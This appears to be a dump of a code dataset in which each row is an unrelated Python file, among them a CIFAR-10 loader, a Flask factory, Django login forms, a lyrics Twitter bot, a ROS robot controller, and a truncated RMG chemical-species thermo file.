text stringlengths 38 1.54M |
|---|
import os
import torchvision as tv
import numpy as np
from PIL import Image
def get_dataset(args, transform_train, transform_test):
    """Build the CIFAR-10 train/test (or train/validation) dataset pair.

    When ``args.validation_exp == "True"`` the official training split is
    carved into train and validation subsets; otherwise the full training
    split is paired with the official CIFAR-10 test split.
    """
    if args.validation_exp == "True":
        # Load once just to read the labels, then re-instantiate with the
        # per-split index lists.
        probe = Cifar10Train(args, train=True, transform=transform_train, download=args.download)
        train_idx, val_idx = train_val_split(args, probe.train_labels)
        cifar_train = Cifar10Train(args, train=True, transform=transform_train, sample_indexes=train_idx)
        testset = Cifar10Train(args, train=True, transform=transform_test, sample_indexes=val_idx)
    else:
        cifar_train = Cifar10Train(args, train=True, transform=transform_train, download=args.download)
        testset = tv.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform_test)
    return cifar_train, testset
def train_val_split(args, train_val):
    """Split training labels into stratified train/validation index lists.

    Draws ``int(args.val_samples / args.num_classes)`` validation samples per
    class, so the validation set is class-balanced.

    Args:
        args: namespace providing ``seed_dataset``, ``val_samples`` and
            ``num_classes``.
        train_val: sequence of integer class labels for the full training set.

    Returns:
        (train_indexes, val_indexes): two shuffled lists of integer indices
        into ``train_val``; together they cover every sample exactly once.
    """
    np.random.seed(args.seed_dataset)
    labels = np.array(train_val)
    train_indexes = []
    val_indexes = []
    val_per_class = int(args.val_samples / args.num_classes)
    # class_id instead of the original `id`, which shadowed the builtin.
    for class_id in range(args.num_classes):
        indexes = np.where(labels == class_id)[0]
        np.random.shuffle(indexes)
        val_indexes.extend(indexes[:val_per_class])
        train_indexes.extend(indexes[val_per_class:])
    np.random.shuffle(train_indexes)
    np.random.shuffle(val_indexes)
    return train_indexes, val_indexes
class Cifar10Train(tv.datasets.CIFAR10):
    """CIFAR-10 training wrapper that optionally restricts the dataset to a
    subset of indices and returns the sample index alongside image and label.
    """

    def __init__(self, args, train=True, transform=None, target_transform=None, sample_indexes=None, download=False):
        super(Cifar10Train, self).__init__(args.train_root, train=train, transform=transform,
                                           target_transform=target_transform, download=download)
        self.root = os.path.expanduser(args.train_root)
        self.transform = transform
        self.target_transform = target_transform
        self.args = args
        # NOTE(review): relies on the legacy .train_data/.train_labels
        # attributes (torchvision < 0.4) — verify the pinned torchvision version.
        if sample_indexes is not None:
            # Keep only the requested subset (used for the train/val split).
            self.train_data = self.train_data[sample_indexes]
            self.train_labels = np.array(self.train_labels)[sample_indexes]
        self.num_classes = self.args.num_classes
        self.data = self.train_data
        # Bug fix: np.long was removed in NumPy 1.24; np.int64 is the
        # equivalent concrete integer dtype.
        self.labels = np.asarray(self.train_labels, dtype=np.int64)
        self.train_samples_idx = []
        # Per-sample bookkeeping; -1 marks "not yet observed".
        self.train_probs = np.ones(len(self.labels)) * (-1)
        self.avg_probs = np.ones(len(self.labels)) * (-1)
        # Tiny epsilon instead of 0 so later divisions by times_seen are safe.
        self.times_seen = np.ones(len(self.labels)) * 1e-6

    def __getitem__(self, index):
        """Return (transformed image, label, sample index)."""
        img, labels = self.data[index], self.labels[index]
        img = Image.fromarray(img)
        if self.transform is not None:
            img = self.transform(img)
        if self.target_transform is not None:
            labels = self.target_transform(labels)
        return img, labels, index
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate, MigrateCommand
from ChordMe.config import Config
# Extensions are instantiated unbound at module level and attached to the
# application inside create_app() — the Flask application-factory pattern.
db = SQLAlchemy()
migrate = Migrate()
bcrypt = Bcrypt()
jwt = JWTManager()
def create_app(config_class=Config):
    """Application factory: build and configure the ChordMe Flask app.

    Args:
        config_class: configuration class/object to load settings from
            (defaults to ``Config``).

    Returns:
        A fully configured :class:`flask.Flask` instance.
    """
    app = Flask(__name__)
    # Bug fix: previously loaded the hard-coded Config, silently ignoring the
    # config_class argument (e.g. a testing configuration passed by callers).
    app.config.from_object(config_class)

    db.init_app(app)
    migrate.init_app(app, db)
    bcrypt.init_app(app)
    jwt.init_app(app)

    # Blueprints are imported here (not at module top) to avoid circular
    # imports with the extension objects defined above.
    from ChordMe.user.routes import user
    app.register_blueprint(user)
    from ChordMe.auth.routes import auth
    app.register_blueprint(auth)

    CORS(app)
    # from ChordMe.error.handlers import error
    # from ChordMe.service.routes import routes
    return app
|
# Read a date typed as "year.month.day" and echo it as "day-month-year".
year, month, day = input().split(".")
print(f"{int(day):02d}-{int(month):02d}-{int(year):04d}")
import nltk
import numpy as np
from nltk.corpus import stopwords
from nltk.corpus import PlaintextCorpusReader
# nltk.download('punkt')
# tokenizers/punkt/english.pickle
from nltk.tokenize import RegexpTokenizer
from string import punctuation
from nltk.corpus import stopwords
from nltk import word_tokenize
# Word-level tokenizer that keeps only alphanumeric runs (drops punctuation).
tokenizer = RegexpTokenizer(r'\w+')
# Corpus of abstracts; the file ids are purely numeric names.
corpus_root = '../data/abstract_50_90'
corpus = PlaintextCorpusReader(corpus_root,fileids='[0-9]+')
# Stopwords for every NLTK language, plus punctuation and the literal
# "None"/"Non" artifacts that occur in the raw abstracts.
stop_words = stopwords.words() + list(punctuation) + ['None','Non']
def tokenize(text):
    """Lower-case and tokenize *text*, dropping stopwords and pure digits.

    Args:
        text: raw document string.

    Returns:
        list[str]: filtered lower-cased word tokens, in original order.
    """
    words = [w.lower() for w in word_tokenize(text)]
    # stop_words is a large list (all NLTK languages + punctuation); a set
    # makes each membership test O(1) instead of a linear scan per token.
    stop_set = set(stop_words)
    return [w for w in words if w not in stop_set and not w.isdigit()]
# Build the corpus vocabulary from the filtered tokens of every document.
vocabulary = set()
for file_id in corpus.fileids():
    vocabulary.update(tokenize(corpus.raw(file_id)))
vocabulary = list(vocabulary)

from sklearn.feature_extraction.text import TfidfVectorizer

tfidf = TfidfVectorizer(stop_words=stop_words, tokenizer=tokenize, vocabulary=vocabulary)
# Fit the TF-IDF model over the whole corpus.
tfidf_mat = tfidf.fit_transform([corpus.raw(file_id) for file_id in corpus.fileids()])
# Bug fix: fit_transform returns a scipy sparse matrix, which np.savetxt
# cannot serialise directly — densify first.
np.savetxt('tfidf_50_90', tfidf_mat.toarray(), delimiter=',', fmt='%1.4e')
|
# -*- encoding: utf-8 -*-
"""
Formularios
===========
Módulo donde se especifícan los distintos formularios utilizados en la
administración de B{L{Home<IS2_R09.apps.home>}}.
"""
from django import forms
from django.contrib.auth.models import User
class login_form(forms.Form):
    """
    Login
    =====
    Form for the system's login page.

    @cvar username: Field where the user enters their user name when logging in.
    @type username: CharField
    @cvar password: Field where the user enters their password when logging in.
    @type password: CharField
    """
    username= forms.CharField(widget=forms.TextInput())
    password= forms.CharField(widget=forms.PasswordInput(render_value=False))
class recuperar_contra(forms.Form):
    """
    Password recovery
    =================
    Form for the system's password-recovery page.

    @cvar email: Field where the user enters the email requesting password recovery.
    @type email: EmailField
    """
    email = forms.EmailField(label= "Email", widget= forms.TextInput())

    def clean_email(self):
        """Validate that the submitted email belongs to a registered user.

        Raises:
            forms.ValidationError: if no user is registered with this email.
        """
        mail = self.cleaned_data['email']
        # .exists() avoids fetching the (previously unused) User row and,
        # unlike .get(), does not raise MultipleObjectsReturned when two
        # accounts share an email address.
        if not User.objects.filter(email=mail).exists():
            raise forms.ValidationError('Email no registrado! Por favor ingrese un email correcto')
        return mail
import logging
from datetime import datetime
import newrelic.agent
from util import cfg
# Configure the New Relic licence key programmatically (instead of via
# newrelic.ini — see the commented initialize() call below).
newrelic.agent.global_settings().license_key = cfg.NEW_RELIC_KEY
# newrelic.agent.initialize(config_file="newrelic.ini", environment="production", log_file="stderr", log_level=logging.DEBUG)
from loguru import logger
import random
import genius_service
import twitter_service
import spotify_client
@newrelic.agent.background_task()
def handler(event, context):
    """Serverless-style entry point: tweet two consecutive lyric lines from a
    random song of the configured artist.

    Args:
        event: standard handler argument (unused).
        context: standard handler argument (unused).
    """
    # Init all API clients.
    spotibot = spotify_client.SpotifyService()
    geniusbot = genius_service.GeniusClient()
    twitterbot = twitter_service.TwitterClient()

    # Get all songs for the artist (defined in cfg).
    songs = spotibot.get_all_artist_songs()

    # Seed from wall-clock time so repeated invocations diverge.
    random.seed(datetime.now().timestamp())
    # Shuffle the list a few times before picking a random song.
    for _ in range(random.randint(1, 120)):
        random.shuffle(songs)
    random_song = random.choice(songs)

    # Get lyrics for the chosen song.
    lyrics = geniusbot.get_lyrics(random_song.track_name, random_song.artist)

    # Pick a random adjacent pair of lyric lines. Assumes at least two lines;
    # randint raises ValueError otherwise, same as before.
    lyric_index = random.randint(0, len(lyrics) - 2)
    tweet_lyrics = f"{lyrics[lyric_index]}\n{lyrics[lyric_index + 1]}"
    logger.debug("Extracted 2 random lyrics")

    # Try to send the tweet a limited number of times before giving up.
    # (Removed the dead `retry_limit = 0` reset that followed the loop —
    # the value was never read again.)
    status = False
    attempts = 0
    logger.debug("Tweeting lyrics")
    while not status and attempts < 2:
        status = twitterbot.tweet(tweet_lyrics)
        attempts += 1
if __name__ == '__main__':
    # Local/manual run: report the execution to New Relic as a background task.
    app = newrelic.agent.register_application(timeout=10.0)
    with newrelic.agent.BackgroundTask(app, name="handler"):
        handler(None, None)
|
import wikinetwork
import os
def test_ral():
    """read_article_links() should yield one (source, target) tuple per
    tab-separated line of the input file."""
    lines = ["raspberrypi\twatermelon\n" for _ in range(5)]
    with open('temp.txt', 'w') as temp:
        temp.writelines(lines)
    try:
        result = wikinetwork.read_article_links('temp.txt')
        assert len(result) == len(lines)
        for pair in result:
            assert pair == ('raspberrypi', 'watermelon')
    finally:
        # Clean up even when an assertion fails (previously the temp file
        # leaked on failure). The no-op os.chdir('.') was dropped.
        os.remove('temp.txt')
# Minimal hand-rolled harness: run every registered test in order, printing
# each test's name before it executes.
tests = [test_ral]
for test in tests:
    print("starting {}".format(test.__name__))
    test()
print("Done testing!!!!!!!!!!!!!!")
|
#!/usr/bin/env python
import roslib
import sys
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import math
from time import time
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Image
class robot_control:
    """Colour-guided mobile-robot controller (ROS, Python 2).

    Subscribes to an RGB camera and a laser scanner, counts the distinct
    pure colours (red/green/blue) seen in a window at the image centre, and
    drives the robot forward and turning based on that colour counter and
    the measured straight-ahead distance.
    """

    def __init__(self):
        # Publisher for velocity commands to the differential driver.
        self.move_pub = rospy.Publisher('/komodo_1/diff_driver/command', Twist, queue_size = 1)
        rospy.init_node('talker')
        self.bridge = CvBridge()
        # Camera feed drives colour detection; laser scan drives distance.
        self.image_sub = rospy.Subscriber("/komodo_1/Asus_Camera/rgb/image_raw",Image,self.callback)
        rospy.Subscriber('/komodo_1/scan', LaserScan, self.check_distance)
        self.red_lintel_found = False
        # Start far away so move_forward()'s distance loop does not exit early.
        self.current_distance = 30.0
        self.length1 = 0.0
        self.length2 = 0.0
        # Number of distinct colours seen so far (drives steering decisions).
        self.colorCounter = 0
        self.sawGreen = False
        self.sawRed = False
        self.sawBlue = False
        self.msg = Twist()

    def stop(self):
        """Halt the robot and give it a second to settle."""
        self.msg.linear.x = 0.0
        self.msg.angular.z = 0.0
        self.move_pub.publish(self.msg)
        rospy.sleep(1.0)

    def calculate_forward_angle(self):
        """Small steering correction depending on the colour-counter state.

        NOTE(review): implicitly returns None when colorCounter is not
        1, 2 or 3 — confirm callers never hit that case.
        """
        if(self.colorCounter == 1):
            return -0.1
        if(self.colorCounter == 2):
            return -0.01
        if(self.colorCounter == 3):
            return 0.04

    def move_forward(self):
        """Drive forward until the laser reads <= 3.0 m, then turn by an
        amount chosen from the colour counter."""
        self.msg.linear.x = 1.0
        self.msg.angular.z = self.calculate_forward_angle()
        self.move_pub.publish(self.msg)
        # Busy-wait: current_distance is updated by the laser callback.
        while(self.current_distance > 3.0):
            self.msg.linear.x = 1.0
        self.stop()
        if self.colorCounter == 1:
            self.msg.angular.z = 0.75
        if self.colorCounter == 2:
            self.msg.angular.z = -0.25
        if self.colorCounter == 3:
            self.msg.angular.z = -0.75
        self.msg.linear.x = 1.0
        self.move_pub.publish(self.msg)
        # Extra late correction for the first and third colour states.
        if self.colorCounter == 3:
            rospy.sleep(1.0)
            print "last change"
            self.msg.angular.z = 0.22
            self.move_pub.publish(self.msg)
        if self.colorCounter == 1:
            rospy.sleep(1.0)
            print "last change"
            self.msg.angular.z = -0.5
            self.move_pub.publish(self.msg)

    def moveRobot(self):
        """Spin in place until red is detected, then run move_forward()."""
        while not self.red_lintel_found:
            self.msg.angular.z = -2.0
            self.move_pub.publish(self.msg)
            rospy.sleep(0.3)
        self.stop()
        print "after first while"
        self.move_forward()

    def callback(self,data):
        """Camera callback: scan a 40x40 window at the image centre for pure
        red/green/blue pixels and update the colour bookkeeping.

        NOTE(review): if imgmsg_to_cv2 raises, cv_image is undefined and the
        line after the except block will crash — confirm intended.
        """
        try:
            cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
        except CvBridgeError as e:
            print(e)
        (rows,cols,channels) = cv_image.shape
        red = False
        blue = False
        green = False
        # BGR thresholds: one channel >= 100 with the other two <= 5 counts
        # as that pure colour. rows/2, cols/2 are integer division (Python 2).
        for x in range((rows/2)-20, (rows/2)+20):
            for y in range((cols/2)-20, (cols/2)+20):
                if(cv_image[x,y,0] <= 5 and cv_image[x,y,1] <= 5 and cv_image[x,y,2] >= 100):
                    red = True
                    if(self.sawRed == False):
                        # First sighting of this colour bumps the counter.
                        self.colorCounter = self.colorCounter + 1
                        self.sawRed = True
                    break
                if(cv_image[x,y,0] >= 100 and cv_image[x,y,1] <= 5 and cv_image[x,y,2] <= 5):
                    blue = True
                    if(self.sawBlue == False):
                        self.colorCounter = self.colorCounter + 1
                        self.sawBlue = True
                    break
                if(cv_image[x,y,0] <= 5 and cv_image[x,y,1] >= 100 and cv_image[x,y,2] <= 5):
                    green = True
                    if(self.sawGreen == False):
                        self.colorCounter = self.colorCounter + 1
                        self.sawGreen = True
                    break
                #print str(cv_image[x,y,0]) + " " + str(cv_image[x,y,1]) + " " + str(cv_image[x,y,2])
        if(green):
            print "green!"
        if(red):
            # Red is the trigger that ends the search spin in moveRobot().
            self.red_lintel_found = True
            print "red!"
        if(blue):
            print "blue!"

    def check_distance(self, laser_data):
        """Laser callback: store the range of the middle (straight-ahead) ray."""
        laser_rays_count = len(laser_data.ranges)
        # Integer division (Python 2) picks the centre ray index.
        middle_ray = laser_rays_count / 2
        self.current_distance = laser_data.ranges[middle_ray]
        print "The distance is: %0.1f" % self.current_distance
def main(args):
    """Entry point: build the controller and run the colour-guided routine."""
    # Movement
    rc = robot_control()
    rc.moveRobot()
if __name__ == '__main__':
    # Run the robot routine when invoked as a script.
    main(sys.argv)
|
species(
label = 'C=[C]C(C)C([O])CC(20840)',
structure = SMILES('C=[C]C(C)C([O])CC'),
E0 = (199.898,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2950,3100,1380,975,1025,1650,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0847516,0.0823914,-6.03071e-05,2.30583e-08,-3.61875e-12,24195.1,33.8741], Tmin=(100,'K'), Tmax=(1480.44,'K')), NASAPolynomial(coeffs=[16.4224,0.0377904,-1.51166e-05,2.70819e-09,-1.82243e-13,19307.6,-52.2398], Tmin=(1480.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(199.898,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(Cds_S)"""),
)
species(
label = 'C2H5CHO(70)',
structure = SMILES('CCC=O'),
E0 = (-204.33,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2782.5,750,1395,475,1775,1000],'cm^-1')),
HinderedRotor(inertia=(0.207559,'amu*angstrom^2'), symmetry=1, barrier=(4.77219,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.208362,'amu*angstrom^2'), symmetry=1, barrier=(4.79065,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3133.67,'J/mol'), sigma=(5.35118,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=489.47 K, Pc=46.4 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.90578,0.0240644,-7.06356e-06,-9.81837e-10,5.55825e-13,-24535.9,13.5806], Tmin=(100,'K'), Tmax=(1712.49,'K')), NASAPolynomial(coeffs=[7.69109,0.0189242,-7.84934e-06,1.38273e-09,-8.99057e-14,-27060.1,-14.6647], Tmin=(1712.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-204.33,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""propanal""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'CH3CHCCH2(18175)',
structure = SMILES('C=C=CC'),
E0 = (145.615,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,540,610,2055,2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(0.759584,'amu*angstrom^2'), symmetry=1, barrier=(17.4643,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (54.0904,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2996.71,'J/mol'), sigma=(5.18551,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=468.08 K, Pc=48.77 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.74635,0.0218189,8.22353e-06,-2.14768e-08,8.55624e-12,17563.6,12.7381], Tmin=(100,'K'), Tmax=(1025.6,'K')), NASAPolynomial(coeffs=[6.82078,0.0192338,-7.45622e-06,1.36536e-09,-9.53195e-14,16028,-10.4333], Tmin=(1025.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(145.615,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(228.648,'J/(mol*K)'), label="""CH3CHCCH2""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'C=C=C(C)C([O])CC(24948)',
structure = SMILES('C=C=C(C)C([O])CC'),
E0 = (118.776,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,350,440,435,1725,2750,2850,1437.5,1250,1305,750,350,254.124,254.125,254.125],'cm^-1')),
HinderedRotor(inertia=(0.0026104,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313431,'amu*angstrom^2'), symmetry=1, barrier=(14.3638,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313435,'amu*angstrom^2'), symmetry=1, barrier=(14.3637,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313431,'amu*angstrom^2'), symmetry=1, barrier=(14.3638,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0605936,0.0816707,-6.22408e-05,2.44562e-08,-3.91001e-12,14437.7,31.5962], Tmin=(100,'K'), Tmax=(1465.11,'K')), NASAPolynomial(coeffs=[17.1556,0.0346674,-1.41181e-05,2.55897e-09,-1.73554e-13,9392.99,-58.0374], Tmin=(1465.11,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(118.776,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(440.667,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C]C(C)C(=O)CC(24949)',
structure = SMILES('C=[C]C(C)C(=O)CC'),
E0 = (27.5574,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,375,552.5,462.5,1710,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.214577,0.0905039,-0.000112418,9.35951e-08,-3.3297e-11,3443.76,30.5337], Tmin=(100,'K'), Tmax=(777.38,'K')), NASAPolynomial(coeffs=[5.85739,0.0532382,-2.46298e-05,4.68995e-09,-3.25708e-13,2815.14,6.33103], Tmin=(777.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(27.5574,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S)"""),
)
species(
label = 'C#CC(C)C([O])CC(24950)',
structure = SMILES('C#CC(C)C([O])CC'),
E0 = (127.006,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,750,770,3400,2100,2175,525,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.228102,0.0833961,-6.75518e-05,2.94075e-08,-5.19695e-12,15435.5,31.7213], Tmin=(100,'K'), Tmax=(1349.79,'K')), NASAPolynomial(coeffs=[16.5668,0.0336253,-1.2242e-05,2.08959e-09,-1.37274e-13,10901.6,-54.3421], Tmin=(1349.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(127.006,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CtCsCsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(CC(C)OJ)"""),
)
species(
label = 'CC[CH][O](563)',
structure = SMILES('CC[CH][O]'),
E0 = (133.127,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,298.357,1774.23],'cm^-1')),
HinderedRotor(inertia=(0.129074,'amu*angstrom^2'), symmetry=1, barrier=(8.14273,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00364816,'amu*angstrom^2'), symmetry=1, barrier=(8.14268,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.1585,0.0245341,-8.42945e-06,1.83944e-10,2.32791e-13,16036.2,14.3859], Tmin=(100,'K'), Tmax=(2077.96,'K')), NASAPolynomial(coeffs=[11.8474,0.0146996,-6.30487e-06,1.09829e-09,-6.9226e-14,10937.4,-37.4679], Tmin=(2077.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.127,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(CCOJ) + radical(CCsJOH)"""),
)
species(
label = 'CH3(17)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
